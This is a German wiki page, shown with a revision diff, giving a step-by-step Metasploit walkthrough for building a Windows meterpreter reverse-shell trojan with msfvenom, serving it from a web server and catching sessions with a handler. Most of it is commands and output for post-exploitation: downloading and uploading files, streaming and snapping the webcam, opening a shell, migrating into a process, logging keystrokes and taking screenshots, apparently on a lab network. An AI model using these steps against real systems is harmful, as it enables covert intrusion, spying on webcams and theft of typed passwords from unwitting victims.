Metasploit trojaner windows: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 22: | Zeile 22: | ||
*msf > use exploit/multi/handler | *msf > use exploit/multi/handler | ||
*msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp | *msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp | ||
| − | *msf exploit(handler) > set LHOST | + | *msf exploit(handler) > set LHOST 0.0.0.0 |
LHOST => 10.0.10.101 | LHOST => 10.0.10.101 | ||
*msf exploit(handler) > set LPORT 4444 | *msf exploit(handler) > set LPORT 4444 | ||
Version vom 27. September 2021, 14:46 Uhr
create Payload
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f exe > shell.exe
- cp shell.exe /var/www/html/
get Payload on the target computer an start
Launch Console
- msfconsole
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v4.16.6-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 10.0.10.101
- msf exploit(handler) > set LPORT 4444
LPORT => 4444
Start the exploits
- msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.81.1.91:4444
Viewing the sessions
- msf exploit(handler) > sessions
Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/windows shuttle\xinux @ SHUTTLE 10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)
Changing the sessions
- msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Metapreter File Management
pwd
- meterpreter > pwd
cd
- meterpreter > cd ..
- meterpreter > cd \\Windows\\System32\\drivers\\etc
Download
- meterpreter > download hosts
upload
- meterpreter > cd \\Users\\xinux
- meterpreter > upload hosts
Webcam
list
- meterpreter > webcam_list
1: Integrated Camera
Live stream
- meterpreter > webcam_stream
[*] Starting... [*] Preparing player... [*] Opening player at: XZLHwhtQ.html [*] Streaming...
snap
- meterpreter > webcam_snap
[*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/PDYSnlbK.jpeg
Start a shell
- meterpreter > shell
Process 6588 created. Channel 1 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. Alle Rechte vorbehalten.
- C:\Users\xinux\Downloads>
Examples Shell
- ipconfig
- route print
- netstat -n
Quit
- STRG+c
Keylogging
- meterpreter > ps | grep notepad
Identify process
Filtering on 'notepad' Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 7480 4100 notepad.exe x64 1 shuttle\xinux C:\Windows\System32\notepad.exe
Migrate to the process
- meterpreter > migrate 7480
[*] Migrating from 5700 to 7480... [*] Migration completed successfully.
Scan start
- meterpreter > keyscan_start
Starting the keystroke sniffer ...
Scan dump
- meterpreter > keyscan_dump
Dumping captured keystrokes...
<UMSCHALT>Hallo <UMSCHALT>Xinux <AKUT><W>ie gehts
Snapshot
- meterpreter > screenshot
Screenshot saved to: /root/xzMjqsca.jpeg
Sysinfo
- meterpreter > sysinfo
Computer : SHUTTLE OS : Windows 10 (Build 14393). Architecture : x64 System Language : de_DE Domain : XI-PIRMASENS Logged On Users : 5 Meterpreter : x86/windows
Kill a Prozess
- meterpreter > pkill notepad
Filtering on 'notepad' Killing: 3240
Run VNC
- meterpreter > run vnc
- [-] Could not execute vnc
- ArgumentError wrong number of arguments (given 2, expected 0..1)